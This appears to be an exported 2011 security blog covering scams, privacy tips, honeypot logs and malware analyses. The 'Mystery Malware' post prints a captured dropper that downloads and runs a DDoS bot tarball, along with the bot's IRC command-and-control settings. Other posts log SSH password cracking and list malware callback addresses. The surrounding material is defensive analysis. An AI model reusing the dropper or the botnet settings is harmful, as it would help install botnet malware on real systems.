Advance Fee Fraud scams dont always come through email. This is a true story from a friend. During the holiday season in 2008, Jeani received notication that she had won a lottery in Russia. This notication was through postal mail, and included a $6,000 check. The scam oered Jeani $25,000 in exchange for her cashing the $6,000 check and returning the money via Western Union within 24 hours. Luckily Jeani suspected this was a scam. Continue on to read the rest of her story... From Jeani:
Before this happened I did not ever hear of a 419 scam or advance fee fraud. This opened my eyes up to the fraud world.
31
BlogBook
1.3. November
The scam was set up with a $6,000 check that we were to cash and then send them the money back but the way they did it is they gave it a 24 hour limit for you to send the money back so that you wouldnt have time for your bank to make sure the check was good or bad then you would be out the money because you would of had sent them the $6,000 through Western Union and then the check would come back bad and you would owe the money back to your bank. The scammer wanted the full $6000 sent back to them and once they got the money from you they would release $25000 to you. I had a feeling it was a scam and did not send them anything. I was leary of this scam from the beginning and did not give them any information at all. Jeani was contacted by Law Enforcement, and helped them to located the scammers, based upon the phone numbers and addresses provided to her. She was one of the lucky ones. Lottery scams like this one have taken thousands from their victims, sometimes even resulting in their kidnapping and possible murder. When asked what advice to give others to help raise awareness, Jeani provided an excellent response:
Anything that seems to good to be true is. You should never have to pay any monies to claim any lottery and if they are out of this country it is a scam. [Editors note: While most of these scams are based overseas in Russia and Nigeria, not all scams originate out of the country.] Jeani, thank you for sharing your story to help others be aware of these types of scams!
1.3.2
11/16/11 is American Internet Censorship Day (2011-11-16 18:46)
Reposted from SecLists.org On 11/16 2011, Congress holds hearings on the rst American Internet censorship system. This bill can pass. If it does the Internet and free speech will never be the same. Im afraid InfoSec News will be forced oine, if you are in the U.S., please visit the URL below and join the ght to stop SOPA! Join all of us on the 16th to stop this bill. [1]http://americancensorship.org/
1. http://americancensorship.org/
1.3.3
If ET were a Hacker, he would just try to phone home... (2011-11-17 18:03)
Up until now, all of the honeypot compromises Ive logged have simply been attempts to propagate network scanning and IRC bots. Todays compromise was a little dierent. It started o with a regular SSH dictionary crack attempt which ultimately succeeded..
2011-11-16 23:54:51-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 95.168.218.166:45132 (192.168.1.165:22) [session: 6] 2011-11-16 23:54:52-0500 [HoneyPotTransport,6,95.168.218.166] Remote SSH version: SSH-2.0libssh-0.1 32
1.3. November
BlogBook
2011-11-16 23:54:52-0500 [HoneyPotTransport,6,95.168.218.166] kex alg, key alg: die-hellmangroup1-sha1 ssh-rsa 2011-11-16 23:54:52-0500 [HoneyPotTransport,6,95.168.218.166] outgoing: aes256-cbc hmac-sha1 none 2011-11-16 23:54:52-0500 [HoneyPotTransport,6,95.168.218.166] incoming: aes256-cbc hmac-sha1 none 2011-11-16 23:54:52-0500 [HoneyPotTransport,6,95.168.218.166] NEW KEYS 2011-11-16 23:54:53-0500 [HoneyPotTransport,6,95.168.218.166] starting service ssh-userauth 2011-11-16 23:54:53-0500 [SSHService ssh-userauth on HoneyPotTransport,6,95.168.218.166] root trying auth password 2011-11-16 23:54:53-0500 [SSHService ssh-userauth on HoneyPotTransport,6,95.168.218.166] login attempt [root/r00tb33r] succeeded 2011-11-16 23:54:53-0500 [SSHService ssh-userauth on HoneyPotTransport,6,95.168.218.166] root authenticated with password 2011-11-16 23:54:53-0500 [SSHService ssh-userauth on HoneyPotTransport,6,95.168.218.166] starting service ssh-connection 2011-11-16 23:54:53-0500 [SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] got channel session request 2011-11-16 23:54:53-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] channel open 2011-11-16 23:54:53-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] pty request: xterm (24, 80, 0, 0) 2011-11-16 23:54:53-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] Terminal size: 24 80 2011-11-16 23:54:53-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] getting shell 2011-11-16 23:54:53-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] Opening TTY log: log/tty/20111116-235453-7554.log 2011-11-16 23:54:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] /etc/motd resolved into /etc/motd 2011-11-16 23:54:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,6,95.168.218.166] /var/run/motd resolved into /var/run/motd Then the attacker proceeded to login from his/her Windows system several hours later, and gather some basic info...
2011-11-17 05:32:25-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 203.97.206.63:18085 (192.168.1.165:22) [session: 23] 2011-11-17 05:32:25-0500 [HoneyPotTransport,23,203.97.206.63] Remote SSH version: SSH-2.0PuTTY Release 0.61 2011-11-17 05:32:25-0500 [HoneyPotTransport,23,203.97.206.63] kex alg, key alg: die-hellmangroup1-sha1 ssh-rsa 2011-11-17 05:32:25-0500 [HoneyPotTransport,23,203.97.206.63] outgoing: aes256-ctr hmac-sha1 none 2011-11-17 05:32:25-0500 [HoneyPotTransport,23,203.97.206.63] incoming: aes256-ctr hmac-sha1 none 2011-11-17 05:32:28-0500 [HoneyPotTransport,23,203.97.206.63] NEW KEYS 2011-11-17 05:32:28-0500 [HoneyPotTransport,23,203.97.206.63] starting service ssh-userauth 2011-11-17 05:32:41-0500 [SSHService ssh-userauth on HoneyPotTransport,23,203.97.206.63] root
33
BlogBook
1.3. November
trying auth none 2011-11-17 05:32:41-0500 [SSHService ssh-userauth on HoneyPotTransport,23,203.97.206.63] root trying auth keyboard-interactive 2011-11-17 05:32:50-0500 [SSHService ssh-userauth on HoneyPotTransport,23,203.97.206.63] login attempt [root/r00tb33r] succeeded 2011-11-17 05:32:50-0500 [SSHService ssh-userauth on HoneyPotTransport,23,203.97.206.63] root authenticated with keyboard-interactive 2011-11-17 05:32:50-0500 [SSHService ssh-userauth on HoneyPotTransport,23,203.97.206.63] starting service ssh-connection 2011-11-17 05:32:50-0500 [SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] got channel session request 2011-11-17 05:32:50-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] channel open 2011-11-17 05:32:50-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] pty request: xterm (24, 80, 0, 0) 2011-11-17 05:32:50-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Terminal size: 24 80 2011-11-17 05:32:51-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] getting shell 2011-11-17 05:32:51-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Opening TTY log: log/tty/20111117-053251-4322.log 2011-11-17 05:32:51-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] /etc/motd resolved into /etc/motd 2011-11-17 05:32:51-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] /var/run/motd resolved into /var/run/motd 2011-11-17 05:32:57-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] CMD: w 2011-11-17 05:32:57-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Command found: w 2011-11-17 05:33:12-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] CMD: cat /proc cpuinfo 2011-11-17 05:33:12-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Command found: cat /proc cpuinfo 2011-11-17 05:33:12-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] /root/cpuinfo resolved into /root/cpuinfo 2011-11-17 05:33:19-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] CMD: cat /proc/cpuinfo 2011-11-17 05:33:19-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Command found: cat /proc/cpuinfo 2011-11-17 05:33:19-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] /proc/cpuinfo resolved into /proc/cpuinfo 2011-11-17 05:33:19-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] Updating realle to honeyfs//proc/cpuinfo This is when things started to turn interesting. The rest of the commands used by the attacker seemed to have one specic purpose...
2011-11-17 05:33:41-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,23,203.97.206.63] CMD: cd /etc/asterisk 34
1.3. November 2011-11-17 05:33:41-0500 [SSHChannel session (0) on SSHService ssh-connection Transport,23,203.97.206.63] Command found: cd /etc/asterisk 2011-11-17 05:33:46-0500 [SSHChannel session (0) on SSHService ssh-connection Transport,23,203.97.206.63] CMD: locate 2011-11-17 05:33:46-0500 [SSHChannel session (0) on SSHService ssh-connection Transport,23,203.97.206.63] Command not found: locate 2011-11-17 05:33:49-0500 [SSHChannel session (0) on SSHService ssh-connection Transport,23,203.97.206.63] CMD: yum 2011-11-17 05:33:49-0500 [SSHChannel session (0) on SSHService ssh-connection Transport,23,203.97.206.63] Command not found: yum 2011-11-17 05:33:53-0500 [SSHChannel session (0) on SSHService ssh-connection Transport,23,203.97.206.63] CMD: apt-get 2011-11-17 05:33:53-0500 [SSHChannel session (0) on SSHService ssh-connection Transport,23,203.97.206.63] Command found: apt-get 2011-11-17 05:34:09-0500 [SSHChannel session (0) on SSHService ssh-connection Transport,23,203.97.206.63] CMD: nd /|grep sip.conf 2011-11-17 05:34:09-0500 [SSHChannel session (0) on SSHService ssh-connection Transport,23,203.97.206.63] Command not found: nd /|grep sip.conf 2011-11-17 05:34:25-0500 [SSHChannel session (0) on SSHService ssh-connection Transport,23,203.97.206.63] CMD: exit 2011-11-17 05:34:25-0500 [SSHChannel session (0) on SSHService ssh-connection Transport,23,203.97.206.63] Command found: exit 2011-11-17 05:34:25-0500 [SSHChannel session (0) on SSHService ssh-connection Transport,23,203.97.206.63] sending close 0 2011-11-17 05:34:25-0500 [SSHChannel session (0) on SSHService ssh-connection Transport,23,203.97.206.63] remote close 2011-11-17 05:34:25-0500 [HoneyPotTransport,23,203.97.206.63] connection lost
BlogBook on HoneyPoton HoneyPoton HoneyPoton HoneyPoton HoneyPoton HoneyPoton HoneyPoton HoneyPoton HoneyPoton HoneyPoton HoneyPoton HoneyPoton HoneyPot-
The attacker was looking for an Asterisk server. This is rather interesting, since the number of attacks against [1]Asterisk (open source VoIP/PBX software) has been increasing recently, per the [2]SANS Internet Storm Center. Is it possible this relates to the recent [3]User Enumeration Weakness which was [4]patched in June 2011? Why are attackers targeting Asterisk? Are they simply trying to phone home for free? The originator of this attack is 203.97.206.63, a customer of the New Zealand broadband provider TelstraClear. The ISP has been notied
1. http://www.asterisk.org/ 2. http://isc.sans.edu/port.html?port=5060 3. http://www.securityfocus.com/bid/48485/info 4. http://downloads.asterisk.org/pub/security/AST-2011-011.html
1.3.4
Protecting electronic devices from an EMP attack (2011-11-21 07:26)
Today one of my articles have been featured as a guest post at ModernSurvivalOnline. The topic of the article is Protecting electronic devices from an EMP attack, a very informative how-to guide. Please visit [1]ModernSurvivalOnline.com to read the article. Thanks!
1. http://modernsurvivalonline.com/guest-post-protecting-electronic-devices-from-an-emp-attack/
35
BlogBook
1.4. December
1.4
1.4.1
December
See whos trying to hack your Facebook prole! (2011-12-01 20:20)
Many links claim to let you see whos stalking you on Facebook. This link claims to let you see whos trying to HACK your Facebook prole! [1]http://bit.ly/vXjiBw Were you brought to this blog post by a shortened link on Facebook? Why did you click that? Havent we learned yet not to click on strange links? After all these years, users are STILL being infected with malware and helping to propagate it by [2]clicking on links they shouldnt. (And yes, that link is safe) URL shorteners such as bit.ly can be very conveniently used to hide malicious links. Heres a little trick to help keep you safer. There are actually URL unshorteners such as [3]UnFwd4Me and [4]Unshorten.com which will reveal the true address of a shotened URL. So, now that your security awareness has been raised, please, share this link with others by copying the text below, and help them raise their security awareness as well! To be more eective, please turn the URL preview OFF. See whos trying to hack your Facebook prole! http://bit.ly/vXjiBw
[5] Related Reading: [6]The (VERY) Unocial Guide to Facebook Privacy

1. http://bit.ly/vXjiBw 2. html 3. http://unfwd4.me/ 4. http://www.unshorten.com/ 5. http://4.bp.blogspot.com/-bJD_GpJHB6g/TtgpTXDKqxI/AAAAAAAAAHE/yaqCqiO_Z6w/s1600/facebook.png 6. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=w_make16 http://facecrooks.com/Safety-Center/Scam-Watch/ WOAH-my-profile-was-viewed-128-times-JUST-TODAY-and-I-can-see-that-I-have-quite-a-few-stalkers-LOL-Find-out-yours-here.
1.4.2
Free IT Security Magazines and Whitepapers from TradePub (2011-12-05 17:51)
Caeine Security has joined forces with TradePub.com to oer you a new, exciting, and entirely free professional resource. Visit [1]http://canesecurity-blogspot.tradepub.com today to browse our selection of complimentary Industry magazines, white papers, webinars, podcasts, and more across 34 industry sectors. No credit cards, coupons, or promo codes required. [2]Try it today! We are pleased to oer you this exciting, new, and entirely free professional resource. Visit our [3]Free Industry resource center today to browse our selection of 600+ complimentary Industry magazines, white papers, webinars, podcasts, and more. Get popular titles including: [4]It\s Time to Think Dierently About Access and Data Center Networks! [5]Cloud First IT: Managing a Growing Network of SaaS Applications [6]Busting the Myth of Email Encryption Complexity 36
1.4. December No credit cards, coupons, or promo codes required. [7]Try it today!
BlogBook
1. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraB:&ch=&_m=01.00ev.1.0.0 2. 3. 4. 5. 6. 7. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraB:&ch=&_m=01.00ev.1.0.0&ct= http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraC:&ch=&_m=01.00ev.1.0.0&ct= http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraC:&ch=&pc=w_arub01&_m=01.00ev. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraC:&ch=&pc=w_okta04&_m=01.00ev. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraC:&ch=&pc=w_sym105&_m=01.00ev. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl/?sr=ps&_t=ps:w_paraC:&ch=&_m=01.00ev.1.0.0&ct= Infosec&flt=all Infosec&flt=all 1.0.0 1.0.0 1.0.0 Infosec&flt=all
1.4.3
Misuse of Your Personal Information and Google Alerts (2011-12-08 19:49)
Its always a good idea to keep tabs on your online presence. This can help prevent embarrassing situations, such as an ex girlfriend posting all your dirty laundry for the world to see, or keep someone from stealing your identity, or using your name or address for fraudulent activities, resulting in the police knocking on YOUR door instead of theirs. Here is an excellent example... One of my former co-workers had a rather interesting event happen to him after moving in to his new house... Someone was running a womens retreat business from his home address! He found this out through randomly searching for his own home address using Google. Apparently someone had setup an entire website for this fake business using the real estate information from his home before purchase. Luckily, this site did not remain online for long, but things could have become really interesting if someone showed up with suitcases in hand expecting to spend a weekend at the retreat they already paid for in full... A few other situations which could happen...
Someone decides to try to rent or sell your house without your knowledge Someone posts your address for a everything for free event on Craigslist as a cover for looting your house A former co-worker or client posts your personal information on an online bulletin board accusing you of something bad, resulting in harassing phone calls from thousands of complete strangers An online group such as Anonymous posts your name and address on bulletin boards to coordinate a prank SWAT raid Your college or university accidentally publishes a list of student names and social security numbers The above are very real situations which have occurred, and could possibly have been avoided (or at least provided some warning) if only the victim would have regularly checked the internet for their personal information. So how can you protect yourself from these situations? One way to protect yourself is to setup Google Alerts to monitor your online presence.
37
BlogBook
1.4. December
Its really easy to do, all you need is a Google account, and visit [1]http://www.google.com/alerts If you use a dierent provider for your email, just use [2]Gmail Forwarding. Setup alerts to be emailed to you on a daily or weekly basis, using the following settings: Search Query: <insert information here> Result Type: Everything How Often: As-it-happens, daily, or weekly, depending on how many alerts you want to recieve How Many: If you expect a lot of info (for example your name is Bill Gates), go with Only the best results. Otherwise, go with All results. Deliver To: Your gmail address Below is an example screenshot. Note I have Deliver To set to Feed to hide my email address...
[3] So what information should you monitor? A few suggestions: Full name Full name with maiden name, if applicable Home Address Home Phone Number Cell Number Personal Web Site Email Address ...Any Other Personally Identifying Information If youd like, use [4]advanced Google search techniques to construct queries such as: My Name -My Employer The above query will hide any results for your name if your employer name is on the same page. This could be useful if your name is Bill Gates and youre employed by Microsoft, and not concerned about news articles which involve your company, but are concerned about people posting other personal information. Also consider monitoring your children, spouse, and parents/grandparents names and contact information. Two items you should NEVER EVER monitor through a Google alert are your credit card number and social security number. Why? If your Google or email account ever gets compromised, the attacker will have instant access to that information!
1. http://www.google.com/alerts 2. http://support.google.com/mail/bin/answer.py?hl=en&answer=10957 3. http://4.bp.blogspot.com/-1TBHKf5M6rc/TuFVd-vsPRI/AAAAAAAAAHM/hmTuUZe_snA/s1600/googlealert.jpg 4. http://support.google.com/websearch/bin/answer.py?hl=en&answer=136861
38
1.4. December
BlogBook
1.4.4
The (VERY) Unocial Guide To Facebook Privacy (2011-12-11 11:35)
To fully understand the privacy of Facebook and how its likely to evolve, you need to understand one thing...Facebook executives want everyone to be public.
[1] As the service evolves, executives tend to favor our open access to information, meaning information you think is private will slowly become public, but that doesnt mean you can be private if you want to. Facebook gives its users the option to lock things down, but users need to be aware of their controls, how to use them and how to prepare for future Facebook privacy changes. Facebook has not and will not make information obvious, and thats where this guide comes in. [2]Get your copy today! And please share this link with your friends and family, so they can better protect their privacy as well!
1. http://3.bp.blogspot.com/-SM4w1qGMnqY/TuTbEuw69gI/AAAAAAAAAHU/IV7MSFoM3Sg/s1600/w_make16c.gif 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=w_make16
1.4.5
Introducing Caeine Security Secure Firefox! (2011-12-11 12:49)
Im proud to announce I have completed my Secure Firefox add-on. Make your Firefox browser more secure! This add-on uses Defense Information System Agency guidelines to harden your browser from attackers. For maximum security, combine this add-on with other security related add-ons such as NoScript! [1]Download Now!
1. https://addons.mozilla.org/en-US/firefox/addon/secure-firefox/
1.4.6
Mystery Malware: An echo powered DDoS Script? (2011-12-12 19:33)
Christmas came early today, and a hacker dropped o a present...a piece of mystery malware. This piece of malware was dropped onto my Linux honeypot simply named DDoser. The le has a [1]0 % detection rate. Interesting. This appears to simply be a Linux/UNIX shell script. It starts with the following line repeated multiple times:
echo 2e61e112030709378914f8280fd09f62e 61e112030709378914f8280fd09f62e61e11203 0709378914f8280fd09f62e61e1120307093789

39
BlogBook 14f8280fd09f62e61e112030709378914f8280f d09f6 And ends with the following lines:
1.4. December
clear echo echo ********************************************** echo The Installation Of D3v1Lz T34m Ddoser echo Should Be Running Now On D3v1Lz Ircds echo echo Make Sure That Ddoser Is Running - Use This Command: echo ps x echo echo If You See addict Listed, Then Its Running. echo You Can Then Fuck Ips Randomly On Your Botnets. echo ********************************************** echo echo Enjoy Our Best Services At WebShells Co. , For More echo Info Contact Us On Tech@WShells.Ws Or Call Us On 03-50 12 10 echo More Info About Script: Chadi@WShells.Ws exit 0 An echo powered DDoS script? That doesnt make sense... A closer inspection reveals the true nature of this le... After repeating the garbage echo line multiple times, the following code executes:
#!/bin/sh clear wget http://d3v1lz.at.ua/DvLz-T34m.tar.gz tar -zxvf DvLz-T34m.tar.gz rm -rf DvLz-T34m.tar.gz killall -9 addict mv DvLz-T34m .dt chmod +x .dt cd .dt chmod +x * ./start.sh clear cd rm -rf DvLz-T34m The le DvLz-T34m.tar.gz has a [2]37 % detection rate through generic detections... This script downloads and installs an apparent DDoS trojan which reports to an IRC command and control center... File mech.set 40
1.4. December NICK DvLz USERFILE user CMDCHAR . LOGIN DvLz IRCNAME D3v1Lz T34m Dd0ser MODES +ixws TOG CC 1 TOG CLOAK 1 TOG SPY 1 SET OPMODES 4 SET BANMODES 6 SET AAWAY 1 TOG NOIDLE 1 CHANNEL #Ddos TOG PUB 1 TOG MASS 1 TOG SHIT 1 TOG PROT 1 TOG ENFM 1 SET ENFM +nstm SET MDL 4 SET MKL 4 SET MBL 4 SET MPL 1 server slain.wshells.ws 6667
BlogBook
So why did the hacker use this script to install the malware, instead of simply directly downloading the malware and installing him/herself? One possibility is to avoid automated analysis by honeypots. By uploading a script to the honeypot, instead of the malware itself, any antivirus scans would have ignored the script le. Furthermore, by burying the script hidden within multiple garbage echo lines, the script has the possibility to avoid detection by automated and manual analysis. With that said, both les have been submitted to AV vendors for analysis and inclusion in their detection signatures. To the hacker who uploaded this malware to my honeypot...thanks for the early Christmas present! Im sorry to say all youre getting is a lump of coal. And a letter to your ISP.
1. 2.
http://www.virustotal.com/file-scan/report.html?id= http://www.virustotal.com/file-scan/report.html?id=
cd37a0f3d1cef10474adf2c344e3c388cfd431664b521073c6903b51635f01ee-1323730198 7de7bb44b248914a3c6b16f6ab3956a552fec2da434dfaad07a3cef4149371ab-1323734691
41
BlogBook
1.4. December
1.4.7
Free Subscription to Security Magazine (2011-12-12 20:02)
[1] Im happy to provide my blog readers a chance to get a free subscription to the print or digital versions of Security magazine, which focuses on ways to apply technology and services to solve security problems. Security magazine reaches 35,000 security end-user and integrator subscribers in government, healthcare, education, airports, seaports, transportation, distribution, utilities, retail, industrial, nancial, hospitality / entertainment, construction, industrial/manufacturing and other markets. [2]Sign up today!
1. http://4.bp.blogspot.com/-opPNsJHFquc/Tuaju7OIRFI/AAAAAAAAAHc/JQRv5WdoiEE/s1600/secc.gif 2. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=sec
1.4.8
Iran,
a Lost Drone,
and a Computer Virus - Lessons to be Learned
(2011-12-13 19:57)
Did a computer virus infection result in Iran acquiring a United States recon drone? In October, the major news outlets announced that the piloting systems used by unmanned recon drones in Afghanistan and other nearby countries was [1]compromised by a virus capable of recording keystrokes or user authentication information. The Air Force followed up with a press release that this virus was only a credential stealer, and [2]was not designed to transmit or corrupt data, and that the systems were completely [3]disconnected from the internet and that the malware was introduced through removable media. The following article is speculation. Its purpose is to highlight important security practices by illustrating possible links between the captured drone and a virus infection which occurred two months prior to the drones capture. The author has no knowledge beyond what has been ocially published. Id like to throw up a red ag here. Credential stealers are traditionally programmed with a call home feature to transmit the stolen credentials to their creator. Why would a credential stealer steal credentials and then only store them locally? Flash forward to the events of the past week, in which a United States stealth drone was [4]captured intact by Iran. Iran even claims they were able to [5]control the drone remotely. This is somewhat disturbing since the drone [6]does not require an outside signal to y or navigate. Based upon the available information, there are multiple possibilities linking the October virus infection with the drone lost 2 months later...
The virus was not a credential stealer at all, and its true purpose was to alter the ight path of specic drones, similar to how Stuxnet only targeted industrial control systems capable of operating centrifuges. The virus was a credential stealer, and stored credentials locally to be retrieved later. Although the infected systems were not the piloting systems, it is very likely the pilots may have used the same login credentials on the piloting systems. This is a disturbing possibility, as it would mean that a member of the military, or a military contractor, has engaged directly in espionage. 42
1.4. December
BlogBook
The virus was an intentional distraction, designed to shift the IT stas focus from monitoring the security of the drones to the local systems, while another attack was performed covertly against the drones themselves And nally, the virus infection could have been completely unrelated, and simply a coincidence. Like all security breaches, this incident should be viewed as a learning opportunity. So what lessons can be learned from this incident?
Treat all removable media such as USB drives with suspicion, even your own. Perform a low-level format after use, and always scan the drive for viruses before and after use. Examine the drive manually for any unexpected les, making sure to view hidden and protected operating system les. Always be aware of the possibility of an insider threat. Look for the warning signs. Implement application whitelisting on sensitive systems, and only disable the whitelist while performing regular security updates. Dont always believe your rst analysis of a piece of unknown malware. It may have hidden features designed to evade detection. Stuxnet is an excellent example. Dont let your investigation of an ongoing security incident result in less monitoring for the rest of your network. Bring in outside help to handle the extra work load if you need to. Finally, as a colleague once told me, correlation does not mean causation. It is very possible that two similar incidents may be completely unrelated, despite their close proximity to each other. Hopefully the Air Force, and the rest of the Department of Defense, will also take the time to learn from this, and prevent a similar incident from happening in the future. As for the original question, did a virus infection result in Iran acquiring a United States drone? We may nd out the full story eventually, but it may take [7]25 years. Related Reading: [8]Data Security and Privacy: A Holistic Approach - A guide to securing sensitive data, online or oine [9]Operation Cleanup - A guide to removing malware infections
1. http://www.pcmag.com/article2/0,2817,2394374,00.asp 2. http://www.pcmag.com/article2/0,2817,2394634,00.asp 3. http://www.afspc.af.mil/news1/story.asp?id=123275647 4. http://abcnews.go.com/Blotter/obama-asks-iran-rq-170-sentinel-drone-back/story?id=15140133 5. http://www.cnn.com/2011/12/13/world/meast/iran-spy-plane/?hpt=hp_t2 6. http://www.businessinsider.com/iran-drone-virus-creech-air-force-base-2011-12 7. http://en.wikipedia.org/wiki/Declassification#Automatic_declassification 8. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=w_ibmc239 9. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=w_make40
1.4.9
Holiday Computer Essentials CD (2011-12-15 19:37)
The holidays are here again. A wonderful time to eat too much, exchange presents, and secure your familys computer systems. Each year IT professionals travel to relatives houses, and are called upon as free tech support to remove the latest virus infections.
43
BlogBook
1.4. December
It helps if you have a CD-R burned and ready to go, so that you can properly clean and secure your familys computer systems. So what should you include on your holiday disaster recovery CD? Fortunately you can assemble such a CD at no cost to you. Note: These numbers assume you are using a 700 MB CD-R. Anti-virus First item youll need is a good Anti-Virus program. My recommendation is to download the oine installer for AVG. [1]AVG Free direct download This will take up 153 MB (32-bit version) and 172 MB (64-bit version) of space, for a total of 326 MB. When xing your family members infected PC, this will be the rst piece of software youll want to install. Also grab the latest virus denitions, 70 MB. This comes to a total of 396 MB. You have 304 MB left on your disk. Anti-Spyware Next up is [2]Spybot Search and Destroy, for Anti-Spyware. Make sure to download the full installation (15.6 MB) as well as the latest detection updates ( 7 MB), for a total of 23 MB. You now have 281 MB left on your disk. Firewall Finally, lets download a rewall to help prevent infection. My favorite is ZoneAlarm. This free rewall is very powerful, and will stop most malware from communicating, as well as prevent external attacks. [3]Download ZoneAlarm Free Firewall Now! This download is only 5 MB. The catch is, youll need internet access to install. Fortunately youve already cleaned up the infected computer, and youre ready to add a nal layer of security. You now have 276 MB left on your disk. How you use the rest is up to you. I would recommend perhaps a few educational ebooks/whitepapers to help raise your familys security awareness. A couple suggested titles: [4]The (VERY) Unocial Guide To Facebook Privacy [5]PC Security Handbook - 2nd Edition
1. http://www.jdoqocy.com/kd116kjspjr6CCB9CBB687EE7EBF 2. http://www.safer-networking.org/en/download/index.html 3. http://www.dpbolvw.net/h577biroiq5BBA8BAA576ADEF7A 4. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=w_make16 5. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=w_winb04
1.4.10
Insider Threats and Data Loss Prevention (2011-12-16 19:37)
[1] 44
1.4. December
BlogBook
One of the biggest challenges many organizations face is how to deal with the insider threat. A common means of attempting to control insider threats is through Data Loss Prevention software. Unfortunately, there is no one clearly superior method for implementing Data Loss Prevention. Im happy to oer to my readers a free research report on dierent Data Loss Prevention techniques from the Aberdeen Group.
[2] The ideal approach to security and compliance is like the ideal referee: one that makes good calls and enforces the rules regarding safety and fair play, but generally doesnt get in the way of the people playing the game. In its fth annual study on best practices in data loss prevention (DLP), Aberdeen analyzed and compared the results from more than 600 organizations which have adopted one of four distinct approaches to the operational use of DLP technologies. The best approach, in terms of balancing enterprise risk and reward, is like the childrens fairy tale of Goldilocks and the Three Bears: the bed we choose to lie in should be neither too soft (Do Nothing, Monitor / Notify), nor too hard (Stop / Go), but just right (Adapt / Protect). [3]Access Your Complimentary Copy Today. This $399 Value Oer Expires 01/09/2012
1. http://3.bp.blogspot.com/-puxbYze_Tjo/TuvkpXIppyI/AAAAAAAAAHw/lCnX8WEYwG8/s1600/w_abeb325.gif 2. http://4.bp.blogspot.com/-xwK6pMvMj5k/TuvkLKCivWI/AAAAAAAAAHo/F2xrrzO-9p8/s1600/w_abeb325c.gif 3. http://caffinesecurity-blogspot.tradepub.com/c/pubRD.mpl?sr=oc&_t=oc:&pc=w_abeb325
1.4.11
New Resource: Threat Watch (2011-12-19 18:12)
The bad guys never sleep. Im happy to announce that now even when Im sleeping, my blog will be able to bring up-to-date news alerts relevant to computer security. Check out the [1]Threat Watch page today!
1. http://caffeinesecurity.blogspot.com/p/threat-watch.html
1.4.12
Linux/Bckdr-RKC Initial Analysis (2011-12-21 23:32)
A malicious user dropped o a VERY interesting piece of malware on my honeypot today with the lename .xsyslog This piece of malware was previously undetected, and many kudos to [1]Sophos for being the rst to conrm my ndings that the software was malicious. So far, I have been able to determine the following: This is a UPX packed Linux ELF which appears to have been around since late November 2011, according to internet searches. The malware is installed from a compromised system after cracking a SSH servers root password, in the path /etc/.xsyslog The malware is downloaded from an IP address which appears to be hosted in Hong Kong by a fake corporation: 216.83.44.229 port 99 It phones home to an IP address which appears to be hosted by the same fake corporation: 216.83.44.226 port 81
45
BlogBook
1.4. December
I have uploaded all relevant strings within the unpacked le to [2]Pastebin. I will provide additional details as I nd/receive them. This malware has been forwarded to US-CERT, as well as multiple anti-virus vendors. Track current AV coverage at [3]http://md5.virscan.org/58c23ca549c941f0d44b35fa31d77011 Related Reading: Sophos Whitepaper [4]Protection for Mac and Linux Computers: Genuine Need or Nice to Have?
